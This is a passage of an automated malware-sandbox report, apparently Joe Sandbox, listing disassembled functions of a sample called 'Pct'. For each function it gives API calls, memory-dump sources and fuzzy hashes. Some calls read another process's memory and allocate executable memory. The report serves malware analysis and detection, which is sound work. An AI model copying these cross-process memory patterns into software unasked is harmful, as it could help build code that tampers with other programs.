                                                                                                                                                    • Part of subcall function 00C21C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C19E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00C21CB0
                                                                                                                                                    • Part of subcall function 00C21BDD: GetWindowThreadProcessId.USER32(?,?,00000000,00000000,?,?,00C19E12,00000034,?,?,00001004,00000000,00000000), ref: 00C21C08
                                                                                                                                                    • Part of subcall function 00C21BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C19E12,00000034,?,?,00001004,00000000,00000000), ref: 00C21C18
                                                                                                                                                    • Part of subcall function 00C21BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C19E12,00000034,?,?,00001004,00000000,00000000), ref: 00C21C2E
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000010,?,00000000,?,00000010,?,00001104,00000000,00000000), ref: 00C1A464
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000000,?,00000010,?,00000000,?,00000010,?,00001104), ref: 00C1A4B1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                                  • Opcode ID: 8f92a18fc2ad44ca6e0a35b26447613d52e8ea26801be6b9bb874b95bbb5c9b1
                                                                                                                                                  • Instruction ID: 05a93532916c2b66637e0c70fb90fa51fc970f0fa80cb9220c8c1d435dbabd3d
                                                                                                                                                  • Opcode Fuzzy Hash: 8f92a18fc2ad44ca6e0a35b26447613d52e8ea26801be6b9bb874b95bbb5c9b1
                                                                                                                                                  • Instruction Fuzzy Hash: 1B416C7690122CAFCB20DBA4CC85ADEB7B8EF05300F044095FA55B7180DA706F85DBA1
                                                                                                                                                  Function 00C479FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?,?,?,SysMonthCal32,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00C47A86
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C47A9A
                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C47ABE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                                  • Opcode ID: 77f472e66884dd191c873744d69315fc6952a9e93fb570e2b1d6ba027e78af8e
                                                                                                                                                  • Instruction ID: 46efa160cb028cdd04b4a9b7dc5f03ab2c58022087f1429281677ad796cf8efc
                                                                                                                                                  • Opcode Fuzzy Hash: 77f472e66884dd191c873744d69315fc6952a9e93fb570e2b1d6ba027e78af8e
                                                                                                                                                  • Instruction Fuzzy Hash: BF218D32600219ABDF258F54CC82FEE3BA9FB48724F111214FE15AB190DBB1A9549BA0
                                                                                                                                                  Function 00C481B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C4826F
                                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C4827D
                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C48284
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                                  • Opcode ID: f8b85c2240e34bf003d8fccb9db84928d0907332b668d7e852c0c25d9987abdc
                                                                                                                                                  • Instruction ID: da2c294bd66e45b32f8c2e8c9679915e2a42212852ad2b937e0745621226f404
                                                                                                                                                  • Opcode Fuzzy Hash: f8b85c2240e34bf003d8fccb9db84928d0907332b668d7e852c0c25d9987abdc
                                                                                                                                                  • Instruction Fuzzy Hash: A6219CB5600209AFDB10DF58CCC5EAB37EDFB49364B140159FA10AB291CB70EC55CBA0
                                                                                                                                                  Function 00C472D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?,?,?,Listbox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00C47360
                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C47370
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C47395
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                  • String ID: Listbox
                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                  • Opcode ID: 7a0cc67b3346371810e5bfe3f684585db964789f1d524e2a520907d4ab7bb7b0
                                                                                                                                                  • Instruction ID: 749aec80ea2c4563b0407eda7a0d18e6d1b01a1bb40b6879fa2887e4a4e513e7
                                                                                                                                                  • Opcode Fuzzy Hash: 7a0cc67b3346371810e5bfe3f684585db964789f1d524e2a520907d4ab7bb7b0
                                                                                                                                                  • Instruction Fuzzy Hash: DA217F32614118BBDB268F54CC85FAF37AAFB89764F118224F9149B1A0DB71AC519BA0
                                                                                                                                                  Function 00C3C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C0027A,?), ref: 00C3C6E7
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00C0027A,?), ref: 00C3C6F9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                                  • Opcode ID: 3dfbf92809ee76ede2e7620061e65c69e1a9ac600b99afc9c996e905ebea1459
                                                                                                                                                  • Instruction ID: 095ffb71bc8e0c9837ceb382f0914bd9e037c5c67f0c2eb4c00103a739dff826
                                                                                                                                                  • Opcode Fuzzy Hash: 3dfbf92809ee76ede2e7620061e65c69e1a9ac600b99afc9c996e905ebea1459
                                                                                                                                                  • Instruction Fuzzy Hash: DFE0EC7D520B229BD7205B25CC89B9E76D8EB05756F608869EC95E2250D770D8808B50
                                                                                                                                                  Function 00BD4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BD4AF7,?), ref: 00BD4BB8
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD4BCA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                                  • Opcode ID: 69ca188240e98709e9459df12afe391b78d48db8f1732fff6ee8a2dc4af086ec
                                                                                                                                                  • Instruction ID: 6aaff654119c1ad46b4f96159246408dfae5baeeef4368247a9c0ef4e669c56a
                                                                                                                                                  • Opcode Fuzzy Hash: 69ca188240e98709e9459df12afe391b78d48db8f1732fff6ee8a2dc4af086ec
                                                                                                                                                  • Instruction Fuzzy Hash: F2D01779510B128FD7209F71DC09B4BB6E5EF14352B21DCBBD88AE2654EB70D8C0CA51
                                                                                                                                                  Function 00C41447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00C41696), ref: 00C41455
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C41467
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                                  • Opcode ID: 5ae390692ea9e8000acde184be7da4ff8aabf3b34580ea659635d1912886a1c9
                                                                                                                                                  • Instruction ID: 9fb46367f0527630158719f846c047e1a6bd0c5da81fa5523d689ef30e7ffe9a
                                                                                                                                                  • Opcode Fuzzy Hash: 5ae390692ea9e8000acde184be7da4ff8aabf3b34580ea659635d1912886a1c9
                                                                                                                                                  • Instruction Fuzzy Hash: 84D01735911B138FD7209FB5C84970B76E4AF06396B25C83E98EAE2560EA70D8C0CB51
                                                                                                                                                  Function 00BD55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BD5E3D), ref: 00BD55FE
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00BD5E3D), ref: 00BD5610
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                                  • Opcode ID: 8218d0e7be34693b8b7bd2ce5ced0c56c0f41fd0cf294a7ee507fe049ddcaa03
                                                                                                                                                  • Instruction ID: a507a44e0c6107caa6fe03c13a0b5e4b2050daf2cb6e780256351e27cd409670
                                                                                                                                                  • Opcode Fuzzy Hash: 8218d0e7be34693b8b7bd2ce5ced0c56c0f41fd0cf294a7ee507fe049ddcaa03
                                                                                                                                                  • Instruction Fuzzy Hash: 4FD01779920F128FE7309F31C809B5BB6E4EF14356B218C7AD886E2295E670C8C0CB95
                                                                                                                                                  Function 00C397CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C393DE,?,00C50980), ref: 00C397D8
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,00C50980), ref: 00C397EA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                                                  • Opcode ID: 4a332a923e870c9f1369eb47f9bd5127ba4c046ac84a3cbd47e59ecd67f81653
                                                                                                                                                  • Instruction ID: f62b84f3eee3992a494bb2f1baee0891a99ffd9da53d42d67fb9e196b512b3b4
                                                                                                                                                  • Opcode Fuzzy Hash: 4a332a923e870c9f1369eb47f9bd5127ba4c046ac84a3cbd47e59ecd67f81653
                                                                                                                                                  • Instruction Fuzzy Hash: E2D01779520B138FD7209F31D98974AB6E4EF05392F21CC3AD897E2190EBB0C9C0CA52
                                                                                                                                                  Function 00C17D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f2ee83a206551a0f37c8de3d76693130a1d0aa28da759d6e2dd14fefb7e9748d
                                                                                                                                                  • Instruction ID: 54d424cae33e3f1860b1e03c1cd225e82951dbf0caced3361f4d39bb92986b17
                                                                                                                                                  • Opcode Fuzzy Hash: f2ee83a206551a0f37c8de3d76693130a1d0aa28da759d6e2dd14fefb7e9748d
                                                                                                                                                  • Instruction Fuzzy Hash: 8FC16D75A0421AEFCB14CF94C884EAEB7F5FF49710B108598E815EB251DB31EE85EB90
                                                                                                                                                  Function 00C3E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00C3E7A7
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00C3E7EA
                                                                                                                                                    • Part of subcall function 00C3DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3DEAE
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C3E9EA
                                                                                                                                                  • _memmove.LIBCMT ref: 00C3E9FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                                  • Opcode ID: 592e5a0744738e01f30827adf074ba1171cab27faa7875085ec515547f44478b
                                                                                                                                                  • Instruction ID: 856f021f20773c8a58425bf98b437463b8a3c0e1af6d638b64f90613272db13b
                                                                                                                                                  • Opcode Fuzzy Hash: 592e5a0744738e01f30827adf074ba1171cab27faa7875085ec515547f44478b
                                                                                                                                                  • Instruction Fuzzy Hash: EAC15C71A183019FC714DF28C450A6ABBE4FF89714F14896EF8999B391D731EA46CF82
                                                                                                                                                  Function 00C3877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00C387AD
                                                                                                                                                  • CoUninitialize.OLE32 ref: 00C387B8
                                                                                                                                                    • Part of subcall function 00C4DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C38A0E,?,00000000), ref: 00C4DF71
                                                                                                                                                  • #8.OLEAUT32(?), ref: 00C387C3
                                                                                                                                                  • #9.OLEAUT32(?), ref: 00C38A94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 948891078-0
                                                                                                                                                  • Opcode ID: 22fe2bea64af96d31e74e0e60deb8f30155f34ce215296c86a75234383cb60f6
                                                                                                                                                  • Instruction ID: af140ce3273307ac92136061d63a3a707406e74204a424f22f5b0fabd53e6709
                                                                                                                                                  • Opcode Fuzzy Hash: 22fe2bea64af96d31e74e0e60deb8f30155f34ce215296c86a75234383cb60f6
                                                                                                                                                  • Instruction Fuzzy Hash: 25A145356147019FCB10EF65C491B2AB7E4BF88310F14889DF996AB3A1CB30EE45DB92
                                                                                                                                                  Function 00C1814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C53C4C,?), ref: 00C18308
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C53C4C,?), ref: 00C18320
                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00C50988,000000FF,?,00000000,00000800,00000000,?,00C53C4C,?), ref: 00C18345
                                                                                                                                                  • _memcmp.LIBCMT ref: 00C18366
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 314563124-0
                                                                                                                                                  • Opcode ID: 5c26a5fef1a1ea738e61b9447208e2de2c1411f5f4611ee5896b69f84a8c6df2
                                                                                                                                                  • Instruction ID: 6257fe10b8351f1aafe2d2ad0fe1dc340fd9abe5c6f15d6e1989c6c8ed15c804
                                                                                                                                                  • Opcode Fuzzy Hash: 5c26a5fef1a1ea738e61b9447208e2de2c1411f5f4611ee5896b69f84a8c6df2
                                                                                                                                                  • Instruction Fuzzy Hash: BD813A75A00109EFCB04DFD4C884EEEB7B9FF89315F244598E515AB250DB71AE4ACB60
                                                                                                                                                  Function 00C1749B Relevance: 6.2, APIs: 4, Instructions: 202COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #8.OLEAUT32(?,?,?,00000001,?,?,?,?,?,?,?,?,?,00C1779C,?,?), ref: 00C174AC
                                                                                                                                                  • #2.OLEAUT32(00000000,?,?,?,?,00C1779C,?,?,00C39B28,?,?,?,?), ref: 00C17555
                                                                                                                                                  • #10.OLEAUT32(?,?,?,?,?,?,?,00C1779C,?,?,00C39B28,?,?,?,?), ref: 00C17584
                                                                                                                                                  • #9.OLEAUT32(?,00000000,?,?,?,?,?,00C1779C,?,?,00C39B28,?,?,?,?), ref: 00C175AB
                                                                                                                                                  Memory Dump Source
